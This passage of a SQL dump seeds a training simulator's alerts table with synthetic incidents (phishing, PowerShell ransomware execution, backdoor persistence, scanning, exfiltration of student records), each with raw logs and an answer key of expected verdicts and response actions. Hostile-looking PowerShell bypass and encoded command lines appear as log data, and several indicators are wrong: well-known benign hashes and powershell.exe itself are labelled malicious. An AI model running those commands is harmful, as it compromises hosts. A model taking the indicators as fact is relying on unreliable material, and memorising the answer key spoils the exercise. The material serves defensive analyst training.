Network\",\"verdict\":\"internal\",\"details\":\"School district internal network\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.471Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1553, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script was executed on the administrator\'s computer, initiating a ransomware payload. The execution followed the opening of a phishing email.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:23:45Z\",\"event_id\":4624,\"computer_name\":\"admin-pc.corp.local\",\"user_name\":\"admin_user\",\"process_name\":\"powershell.exe\",\"script_path\":\"C:\\\\Users\\\\admin_user\\\\Downloads\\\\malicious_script.ps1\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sha256_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.5\",\"destination_ip\":\"192.168.1.50\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\admin_user\\\\Downloads\\\\malicious_script.ps1\"}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known ransomware payloads\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash linked to ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting malicious infrastructure\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account involved in the 
incident\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1554, 'Backdoor Established', 'high', 'Network Traffic Analysis', 'The attackers have successfully installed a backdoor on the compromised system to maintain persistent access. This was detected through unusual outbound network traffic indicating communication with a known malicious IP address.', 'Persistence', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_hash\":\"e9d8f7a3c6b4f1e2d5c8be7f6a9b3c4d\",\"filename\":\"backdoor_installer.exe\",\"username\":\"compromised_user\",\"action\":\"connection_attempt\",\"outcome\":\"allowed\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e9d8f7a3c6b4f1e2d5c8be7f6a9b3c4d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a backdoor installer used by APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual executable found on the system.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1555, 'Internal Network Scanning', 'medium', 'Intrusion Detection System (IDS)', 'An intermediate-level alert indicating potential lateral movement by attackers who have initiated internal network scanning to identify and access critical systems containing sensitive student data.', 'Lateral Movement', 'T1046 - Network Service Scanning', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:58Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.0.5\",\"external_attacker_ip\":\"203.0.113.45\",\"scanned_ports\":[22,80,443],\"user\":\"compromised_user\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"network_scan_tool.exe\",\"event_id\":\"ID34567\",\"severity\":\"medium\",\"action\":\"scan detected\"}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address, part of the local network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal server storing sensitive student data.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known network scanning tool used by APT groups.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"network_scan_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_security\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used 
for network scanning utilities.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_security\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised and used for unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan 
detected\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1556, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Logs', 'As the final step, the attackers exfiltrate student records and other sensitive data, threatening to leak the information unless a ransom is paid.', 'Exfiltration', 'T1048', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:28:32Z\",\"event_id\":\"DLP-2345\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.75\",\"user\":\"jdoe\",\"filename\":\"student_records_2023.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"external_ip\":\"203.0.113.75\",\"message\":\"Sensitive data exfiltrated to external IP via secure channel.\",\"alert\":true}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration destination\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"student_records_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal system\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive student data\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious exfiltration file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal system\",\"verdict\":\"suspicious\",\"details\":\"User involved in suspicious 
activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"},{\"timestamp\":\"2026-03-15T20:57:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"},{\"timestamp\":\"2026-03-15T20:56:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"},{\"timestamp\":\"2026-03-15T20:55:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure channel.\\\",\\\"alert\\\":true}\"},{\"timestamp\":\"2026-03-15T20:54:15.488Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:28:32Z\\\",\\\"event_id\\\":\\\"DLP-2345\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.75\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"student_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"external_ip\\\":\\\"203.0.113.75\\\",\\\"message\\\":\\\"Sensitive data exfiltrated to external IP via secure 
channel.\\\",\\\"alert\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1557, 'Suspicious Phishing Email Detected', 'high', 'Email gateway logs', 'An incoming email has been detected with characteristics typical of a phishing attempt. The email contains a malicious attachment, commonly associated with Hive ransomware actors, aiming to gain initial access to the network.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"email_id\":\"2345abcde6789fghijk\",\"sender_email\":\"malicious_actor@example.com\",\"recipient_email\":\"john.doe@victimcompany.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"Invoice_2023Q4.xlsm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sender_ip\":\"203.0.113.5\",\"recipient_ip\":\"192.168.1.25\",\"headers\":{\"X-Mailer\":\"Microsoft Outlook\",\"X-Phishing-Score\":\"9.8\",\"X-AntiSpam-Result\":\"Suspected\"}}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"malicious_actor@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing email address associated with multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to C2 infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious macro-enabled Excel file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, 
NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.512Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1558, 'Execution of Malicious Payload', 'critical', 'Endpoint detection and response (EDR) logs', 'Following initial access, the malicious payload is executed on the compromised system, marking the transition from infiltration to active compromise.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T14:32:00Z\",\"event_id\":\"4625\",\"event_type\":\"process_creation\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransom.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"ransom.exe\"}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransom.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareAnalysis\",\"verdict\":\"malicious\",\"details\":\"File associated with ransomware execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1559, 'Establishment of Persistent Backdoor', 'high', 'System registry and scheduled tasks analysis', 'An advanced persistence mechanism was detected on a host system. The attackers have modified the Windows registry to run a malicious executable upon system start and scheduled a task to ensure the persistent backdoor remains active. The executable is associated with known APT activity.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:18Z\",\"event_id\":7045,\"system\":{\"host\":\"host1234.corp.local\",\"ip_address\":\"192.168.1.25\",\"user\":\"SYSTEM\"},\"event\":{\"type\":\"Registry Modification\",\"action\":\"Key Added\",\"key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"key_value\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\"},\"scheduled_task\":{\"name\":\"UpdateTask\",\"action\":\"Create\",\"command\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"trigger\":\"Daily\"},\"network\":{\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\"},\"file\":{\"path\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"hash\":\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\"}}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for 
persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Executable file used for establishing persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key 